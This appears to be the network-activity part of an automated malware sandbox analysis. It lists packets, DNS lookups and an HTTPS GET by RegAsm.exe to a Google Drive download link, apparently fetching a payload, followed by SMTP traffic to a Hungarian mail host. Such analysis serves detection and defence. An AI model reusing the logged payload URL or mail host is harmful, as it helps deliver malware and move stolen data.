                                        Oct 13, 2021 16:33:05.515654087 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.515830994 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.515842915 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.515912056 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.516019106 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.516172886 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.516221046 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.516490936 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.516556978 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.516717911 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.516791105 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.516799927 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.516848087 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.516874075 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.516999960 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.517349005 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.517509937 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.517544985 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.517674923 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.517757893 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.517771959 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.517832041 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.517851114 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.517967939 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.518163919 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.518481970 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.518661022 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.518727064 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.518748999 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.518769026 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.518805981 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.518894911 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.518908024 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.519284010 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.519440889 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.519444942 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.519510031 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.519690990 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.519723892 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.519867897 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.520220041 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.520375967 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.520390987 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.520457029 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.520530939 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.520541906 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.520709038 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.520762920 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.520773888 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.521002054 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.521037102 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.521065950 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.521182060 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.521209002 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.521214008 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.521259069 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.521423101 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.521819115 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.522022009 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.522037029 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.522104979 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.522176027 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.522335052 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.522380114 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.522675991 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.523279905 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.523447037 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.523469925 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.523535967 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.523619890 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.523648977 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.523715973 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.523806095 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.523840904 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.523998976 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.525341988 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.525515079 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.525594950 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.525593042 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.525641918 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.525681019 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.525738001 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.525757074 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.525774956 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.525790930 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.525965929 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526005983 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526034117 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526113033 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526134014 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526194096 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526211977 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526329041 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526343107 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526401997 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526431084 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526472092 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526520014 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526556015 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526678085 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526680946 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526698112 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.526751995 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526822090 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.526870966 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.527015924 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.527163982 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.527185917 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.527206898 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.527354002 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.527379990 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.527398109 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.527533054 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.527549028 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.527550936 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.527573109 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.527731895 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.527951002 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.528100014 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.528117895 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.528263092 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.528295040 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.528299093 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.528327942 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.528439045 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.528477907 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.528512001 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.528613091 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.528740883 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.528824091 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529040098 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529053926 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.529073000 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529170036 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529232979 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.529262066 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529268980 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.529279947 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529377937 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529413939 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.529436111 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529521942 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.529639006 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.529715061 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529942989 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.529964924 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.529985905 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530133009 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.530149937 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530168056 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530281067 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.530318975 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530368090 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530406952 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.530436993 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530488014 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.530548096 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.530565023 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530740023 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.530769110 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530919075 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.530922890 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.530949116 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531115055 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531117916 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.531141043 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531255007 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.531260967 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531269073 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.531289101 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531460047 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.531486988 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531507015 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531689882 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531730890 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.531763077 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531841993 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.531878948 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.531929016 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.531955004 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.532068968 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.532079935 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.532131910 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.532150030 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.532231092 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.532320976 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.532480955 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.532629013 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.532656908 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.532772064 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.532809973 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.532840967 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.532918930 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.532952070 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533035994 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533071041 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533102989 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533143044 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533195019 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533214092 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533296108 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533324003 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533423901 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533423901 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533483982 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533505917 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533535004 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533601999 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533740044 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533762932 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533790112 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533874989 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533890009 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.533920050 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.533967972 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.534030914 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:33:05.534061909 CEST44349756142.250.184.193192.168.11.20
                                        Oct 13, 2021 16:33:05.534094095 CEST49756443192.168.11.20142.250.184.193
                                        Oct 13, 2021 16:34:41.253576994 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.273089886 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.273247004 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.350827932 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.351372004 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.371068001 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.371360064 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.392384052 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.395304918 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.420197964 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.420258045 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.420305014 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.420336962 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.420496941 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.421627045 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.424868107 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.444643021 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.486612082 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.591067076 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.610609055 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.612457991 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.632363081 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.632899046 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.656090975 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.656719923 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.676634073 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.677021027 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.735794067 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.807358980 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.807765007 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.827119112 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.857863903 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.857908964 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.857911110 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.858001947 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:34:41.877388954 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.877437115 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.877521992 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:41.877553940 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:43.086245060 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:34:43.126842022 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:35:43.149774075 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:35:43.150007010 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:36:21.167957067 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:36:21.188999891 CEST58749769185.111.89.226192.168.11.20
                                        Oct 13, 2021 16:36:21.189182043 CEST49769587192.168.11.20185.111.89.226
                                        Oct 13, 2021 16:36:21.189613104 CEST49769587192.168.11.20185.111.89.226

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 13, 2021 16:33:04.292656898 CEST5301653192.168.11.201.1.1.1
                                        Oct 13, 2021 16:33:04.325974941 CEST53530161.1.1.1192.168.11.20
                                        Oct 13, 2021 16:33:05.163070917 CEST5706753192.168.11.201.1.1.1
                                        Oct 13, 2021 16:33:05.202397108 CEST53570671.1.1.1192.168.11.20
                                        Oct 13, 2021 16:34:41.143795967 CEST5505353192.168.11.201.1.1.1
                                        Oct 13, 2021 16:34:41.202826977 CEST53550531.1.1.1192.168.11.20
                                        Oct 13, 2021 16:35:29.343837976 CEST5501153192.168.11.201.1.1.1
                                        Oct 13, 2021 16:35:29.415577888 CEST53550111.1.1.1192.168.11.20

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Oct 13, 2021 16:33:04.292656898 CEST192.168.11.201.1.1.10xdaf6Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                        Oct 13, 2021 16:33:05.163070917 CEST192.168.11.201.1.1.10xc127Standard query (0)doc-04-9g-docs.googleusercontent.comA (IP address)IN (0x0001)
                                        Oct 13, 2021 16:34:41.143795967 CEST192.168.11.201.1.1.10xfad0Standard query (0)mail.csavarcsapagyexpress.huA (IP address)IN (0x0001)
                                        Oct 13, 2021 16:35:29.343837976 CEST192.168.11.201.1.1.10x3d59Standard query (0)spclient.wg.spotify.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Oct 13, 2021 16:32:27.476210117 CEST1.1.1.1192.168.11.200x4d46No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                        Oct 13, 2021 16:32:27.476210117 CEST1.1.1.1192.168.11.200x4d46No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                        Oct 13, 2021 16:33:04.325974941 CEST1.1.1.1192.168.11.200xdaf6No error (0)drive.google.com172.217.168.46A (IP address)IN (0x0001)
                                        Oct 13, 2021 16:33:05.202397108 CEST1.1.1.1192.168.11.200xc127No error (0)doc-04-9g-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                        Oct 13, 2021 16:33:05.202397108 CEST1.1.1.1192.168.11.200xc127No error (0)googlehosted.l.googleusercontent.com142.250.184.193A (IP address)IN (0x0001)
                                        Oct 13, 2021 16:34:41.202826977 CEST1.1.1.1192.168.11.200xfad0No error (0)mail.csavarcsapagyexpress.hucsavarcsapagyexpress.huCNAME (Canonical name)IN (0x0001)
                                        Oct 13, 2021 16:34:41.202826977 CEST1.1.1.1192.168.11.200xfad0No error (0)csavarcsapagyexpress.hu185.111.89.226A (IP address)IN (0x0001)
                                        Oct 13, 2021 16:35:29.415577888 CEST1.1.1.1192.168.11.200x3d59No error (0)spclient.wg.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)
                                        Oct 13, 2021 16:35:29.415577888 CEST1.1.1.1192.168.11.200x3d59No error (0)edge-web.dual-gslb.spotify.com35.186.224.25A (IP address)IN (0x0001)
                                        Oct 13, 2021 16:38:43.594571114 CEST1.1.1.1192.168.11.200xeb1dNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • drive.google.com
                                        • doc-04-9g-docs.googleusercontent.com

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.11.2049755172.217.168.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-10-13 14:33:04 UTC0OUTGET /uc?export=download&id=1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2021-10-13 14:33:05 UTC0INHTTP/1.1 302 Moved Temporarily
                                        Content-Type: text/html; charset=UTF-8
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 13 Oct 2021 14:33:05 GMT
                                        Location: https://doc-04-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/p9irpuq1lj8ip6m4433g3knsldrdvp8d/1634135550000/12448148553778765603/*/1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov?e=download
                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                        Content-Security-Policy: script-src 'nonce-/XuW6cejGet+Rpc+yNySUg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        X-XSS-Protection: 1; mode=block
                                        Server: GSE
                                        Set-Cookie: NID=511=aN5PiPOMj0LVKUNpXCcU1RD_Xbgzj8HrFM4EPKZGZmRpqqaixKLUkESSeUtrg8qWrAZqDHpxI3dbklVSzBZ6csohAUlrK-Y7rQL-djwo07_NgTwa1uniUQmsXFr_oQCAguf9TtsatJH875kUibRwyQdtMj90yJjkpGPPugIoOr0; expires=Thu, 14-Apr-2022 14:33:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Accept-Ranges: none
                                        Vary: Accept-Encoding
                                        Connection: close
                                        Transfer-Encoding: chunked
